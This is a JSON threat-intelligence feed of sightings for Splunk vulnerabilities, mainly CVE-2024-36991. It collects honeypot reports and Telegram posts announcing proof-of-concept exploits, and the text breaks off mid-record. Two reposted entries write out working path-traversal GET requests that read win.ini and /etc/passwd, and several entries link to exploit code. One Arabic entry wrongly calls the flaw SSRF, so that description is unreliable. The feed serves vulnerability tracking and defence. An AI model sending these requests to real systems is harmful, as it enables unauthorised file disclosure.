{"vulnerability": "CVE-2024-3699", "sightings": [{"uuid": "69ec30aa-2207-44ed-b3c9-063bde080aa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "46765e74-0325-47a6-a54f-e43583055afe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "33f02729-a5a8-4753-a569-e4608da17599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "f091c5f8-c07e-4427-988a-d998cede4c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/rexkyris.bsky.social/post/3lxnk2caous2p", "content": "", "creation_timestamp": "2025-08-30T21:42:12.957099Z"}, {"uuid": "4a58dca3-5bcd-4d61-9ab4-11dffd654d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "5be242b2-a61b-4c33-a585-7ff1c21be8d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-08-10T18:27:44.000000Z"}, {"uuid": "02f06b66-0c6a-4171-994a-d81d51534353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "fc049760-aa43-438a-bc31-02b118f33cee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-09-10T07:47:56.000000Z"}, {"uuid": "a4a0b124-210d-4c7f-a476-f7db5fb01aa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36998", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mcz2i4jvyf2r", "content": "", "creation_timestamp": "2026-01-22T11:12:06.447650Z"}, {"uuid": "4f83d2d0-029c-481d-9003-04ea71e59c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfbkl44vos2x", "content": "", "creation_timestamp": "2026-02-20T07:11:44.003715Z"}, {"uuid": "f49aa3d9-088a-4469-b823-789cc6a1bf37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7885", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-36991: Will attempt to read Splunk /etc/passwd file\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T00:54:38.000000Z"}, {"uuid": "3b5b556d-a755-42a9-8b19-cfa95823dd0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36996", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1824", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36996\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.109, an attacker could determine whether or not another user exists on the instance by deciphering the error response that they would likely receive from the instance when they attempt to log in. This disclosure could then lead to additional brute-force password-guessing attacks. This vulnerability would require that the Splunk platform instance uses the Security Assertion Markup Language (SAML) authentication scheme.\n\ud83d\udccf Published: 2024-07-01T16:30:41.186Z\n\ud83d\udccf Modified: 2025-01-15T17:05:44.757Z\n\ud83d\udd17 References:\n1. https://advisory.splunk.com/advisories/SVD-2024-0716", "creation_timestamp": "2025-01-15T17:55:07.000000Z"}, {"uuid": "4aecac0e-9ab6-481d-b138-e12f7589cced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13269", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 PoC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-12T02:03:25.000000Z"}, {"uuid": "6cfe4bd8-4fad-49e6-8f18-81b213a52385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36992", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1107", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36992\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could craft a malicious payload through a View that could result in execution of unauthorized JavaScript code in the browser of a user. The \u201curl\u201d parameter of the Dashboard element does not have proper input validation to reject invalid URLs, which could lead to a Persistent Cross-site Scripting (XSS) exploit.\n\ud83d\udccf Published: 2024-07-01T16:30:51.507Z\n\ud83d\udccf Modified: 2025-01-09T21:36:57.174Z\n\ud83d\udd17 References:\n1. https://advisory.splunk.com/advisories/SVD-2024-0712", "creation_timestamp": "2025-01-09T22:16:07.000000Z"}, {"uuid": "657cc440-9a70-4298-9c3d-bc91f903454c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36995", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1108", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36995\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could create experimental items.\n\ud83d\udccf Published: 2024-07-01T16:52:57.700Z\n\ud83d\udccf Modified: 2025-01-09T21:36:30.507Z\n\ud83d\udd17 References:\n1. https://advisory.splunk.com/advisories/SVD-2024-0715\n2. https://research.splunk.com/application/84afda04-0cd6-466b-869e-70d6407d0a34", "creation_timestamp": "2025-01-09T22:16:09.000000Z"}, {"uuid": "bbad8687-15ae-4297-a300-305c52102276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7888", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T15:51:16.000000Z"}, {"uuid": "971898fa-00e7-4608-b391-5e98b315062c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/11767", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "8160d65b-3d83-4140-9117-24408706e855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/4i6s3KfgWVh_DHJQiP6LOg4zOt9ZFvgpOgBykl90WfOOGjE", "content": "", "creation_timestamp": "2025-07-06T09:00:05.000000Z"}, {"uuid": "c76c0439-892a-4430-ae2d-b558e8dc5b14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/YYbp8A9GMf8S2ZHygr8s4p3ZiOzWHZG8LUtOUPbma0fC_9Yx", "content": "", "creation_timestamp": "2024-07-13T23:43:32.000000Z"}, {"uuid": "b3ed818a-5c7f-4e3f-b7df-799164d6cf88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/ZFIen287iSvZiRFjAWLrPXmFw1-8T2ZoBZdpp1iPhBx88g", "content": "", "creation_timestamp": "2024-07-07T12:50:34.000000Z"}, {"uuid": "ff681158-83e1-40cf-86f4-fa5ac27c22e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1183", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "003e6577-76e1-46c9-ba6d-d77312563dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/malwaremanzero/121", "content": "CVE-2024-36991 \u062f\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0627\u0643\u062a\u0634\u0641\u0648\u0647\u0627 \u0641\u064a \u0628\u0639\u0636 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0645\u0646 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0648\u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0636\u0639\u0641 \u0641\u064a \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u062c\u0627\u0646\u0628\u064a\u0629 SSRF \u0623\u0648 Server-Side Request Forgery \u0627\u0644\u0640 SSRF \u062f\u064a \u062a\u0642\u0646\u064a\u0629 \u0628\u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0639\u0634\u0627\u0646 \u064a\u062a\u062d\u0643\u0645\u0648\u0627 \u0641\u064a \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u062f\u0647 \u0628\u064a\u0633\u0645\u062d \u0644\u0647\u0645 \u0625\u0646\u0647\u0645 \u064a\u0646\u0641\u0630\u0648\u0627 \u0637\u0644\u0628\u0627\u062a \u0645\u0634 \u0645\u0635\u0631\u062d \u0628\u0647\u0627 \u0644\u0645\u0648\u0627\u0631\u062f \u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062e\u0627\u0631\u062c\u064a\u0629 \u0645\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0639\u0634\u0627\u0646 \u064a\u0642\u062a\u062d\u0645 \u0634\u0628\u0643\u0627\u062a \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0623\u0648 \u064a\u0633\u0631\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0623\u0648 \u064a\u0646\u0641\u0630 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0647\u062f\u0641 \u0645\u0646 CVE-2024-36991 \u0647\u0648 \u062a\u0648\u0636\u064a\u062d \u0625\u0632\u0627\u064a \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647 \u0648\u062e\u0637\u0648\u0631\u062a\u0647 \u0627\u0644\u0643\u0628\u064a\u0631\u0629 \u0625\u0632\u0627\u064a\u061f \u064a\u0639\u0646\u064a \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0628\u0639\u062a \u0637\u0644\u0628 HTTP \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u062f\u0644 \u0645\u0627 \u064a\u0628\u0639\u062a \u0645\u0646 \u062c\u0647\u0627\u0632\u0647 \u0627\u0644\u0634\u062e\u0635\u064a \u0648\u062f\u0647 \u0628\u064a\u062e\u0641\u064a \u0647\u0648\u064a\u062a\u0647 \u0648\u0628\u064a\u0635\u0639\u0628 \u062a\u062a\u0628\u0639\u0647 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0628\u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0636\u0639\u0641 \u0641\u064a \u0622\u0644\u064a\u0629 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u062d\u0629 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0623\u0648 \u0639\u062f\u0645 \u062a\u0641\u0639\u064a\u0644 \u0642\u064a\u0648\u062f \u0635\u0627\u0631\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 CVE-2024-36991 \u0645\u0645\u0643\u0646 \u062a\u0633\u062a\u062e\u062f\u0645 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0632\u064a \u0645\u0641\u0627\u062a\u064a\u062d API \u0623\u0648 \u0623\u0643\u0648\u0627\u062f \u0627\u0644\u062f\u062e\u0648\u0644 \u0644\u0644\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0646\u0641\u064a\u0630 \u0623\u0643\u0648\u0627\u062f \u062e\u0628\u064a\u062b\u0629 \u062c\u0648\u0647 \u0627\u0644\u0634\u0628\u0643\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629 \u0628\u0645\u062c\u0631\u062f \u0645\u0627 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u062a\u062f\u0641\u0642 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0627\u0646\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u062f\u064a\u0647 \u0641\u0631\u0635\u0629 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0623\u0646\u0638\u0645\u0629 \u0623\u0643\u062a\u0631 \u0623\u0648 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0623\u0643\u062a\u0631 \u062d\u0633\u0627\u0633\u064a\u0629 \u0643\u0645\u0627\u0646 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0644\u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a DDoS \u0623\u0648 Distributed Denial of Service \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u063a\u0631\u0627\u0642 \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0637\u0644\u0628\u0627\u062a \u0645\u062a\u0643\u0631\u0631\u0629 \u0644\u062d\u062f \u0645\u0627 \u064a\u0639\u0637\u0644\u0647 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0645\u062f\u064a\u0631\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0645\u0647\u0646\u062f\u0633\u064a \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0644\u0627\u0632\u0645 \u064a\u062a\u0623\u0643\u062f\u0648\u0627 \u0625\u0646\u0647\u0645 \u0628\u064a\u062d\u062f\u062b\u0648\u0627 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0644\u0622\u062e\u0631 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u0639\u0627\u0644\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0641\u0639\u0644\u0648\u0627 \u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0632\u064a \u0641\u062d\u0635 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0648\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u0644\u0627\u062d\u064a\u062a\u0647\u0627 \u0648\u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0645\u0648\u0627\u0631\u062f \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0648\u0639\u062f\u0645 \u0627\u0644\u062b\u0642\u0629 \u0641\u064a \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u0645\u0634 \u0645\u0648\u062b\u0648\u0642\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0627\u0644\u0645\u062d\u062a\u0631\u0641 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u062d\u0642\u0642 \u0623\u0647\u062f\u0627\u0641 \u0643\u062a\u064a\u0631\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0623\u0648 \u062d\u062a\u0649 \u0625\u0639\u062f\u0627\u062f \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0648\u0623\u0639\u0642\u062f \u0644\u0627\u0632\u0645 \u0646\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u062c\u062f\u064a\u0629 \u0643\u0627\u0645\u0644\u0629 \u0644\u0625\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0645\u0645\u0643\u0646 \u064a\u0624\u062f\u064a \u0644\u062e\u0633\u0627\u0626\u0631 \u0643\u0628\u064a\u0631\u0629 \u0641\u064a \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0648\u0642\u0641 \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0645\u0647\u0645\u0629 \u0648\u0643\u0645\u0627\u0646 \u062a\u0623\u062b\u064a\u0631 \u0633\u0644\u0628\u064a \u0639\u0644\u0649 \u0633\u0645\u0639\u0629 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0639\u0631\u0636 \u0644\u0644\u0647\u062c\u0648\u0645 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0646\u0642\u062f\u0631 \u0646\u0642\u0648\u0644 \u0625\u0646 CVE-2024-36991 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0637\u0644\u0628 \u0648\u0639\u064a \u062a\u0642\u0646\u064a \u0639\u0627\u0644\u064a \u0648\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0635\u0627\u0631\u0645\u0629 \u0639\u0634\u0627\u0646 \u0646\u0645\u0646\u0639 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0648\u0646\u062d\u0645\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0645\u0646 \u0627\u0644\u062a\u0647\u062f\u064a\u062f\u0627\u062a \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0632\u064a\u062f \u064a\u0648\u0645 \u0628\u0639\u062f \u064a\u0648\u0645\n\n\u0631\u0627\u0628\u0637 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644", "creation_timestamp": "2024-07-21T22:52:36.000000Z"}, {"uuid": "4828712f-6985-4bd3-a9d9-ac27721a5e78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1644", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://x.com/DarkWebInformer/status/1810303232775700641", "creation_timestamp": "2024-07-08T15:24:45.000000Z"}, {"uuid": "5f1a79be-2563-4b01-9db6-85489c1b8538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/6999", "content": "\u200aCritical Splunk Vulnerability Exploited Using Crafted GET Commands\n\nhttps://cybersecuritynews.com/critical-splunk-vulnerability-cve-2024-36991-exploit/", "creation_timestamp": "2024-07-23T10:41:53.000000Z"}, {"uuid": "3db5b427-2eef-41e2-828e-388d8c9a1617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/Tf7RAmO5ucsEOjBgsAIXqXRYfzXLNzHzE3kkLB18s4bauF0", "content": "", "creation_timestamp": "2025-03-31T05:00:07.000000Z"}, {"uuid": "7500735b-8405-4859-b7ca-b932a27d371e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/756", "content": "POC for Splunk CVE-2024-36991\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-06T11:33:13.000000Z"}, {"uuid": "17285d2b-237f-47b6-a9d4-fb5d58f093b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/396", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T02:46:52.000000Z"}, {"uuid": "b9fc662c-da0c-4e27-aa2f-485061bf99f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": 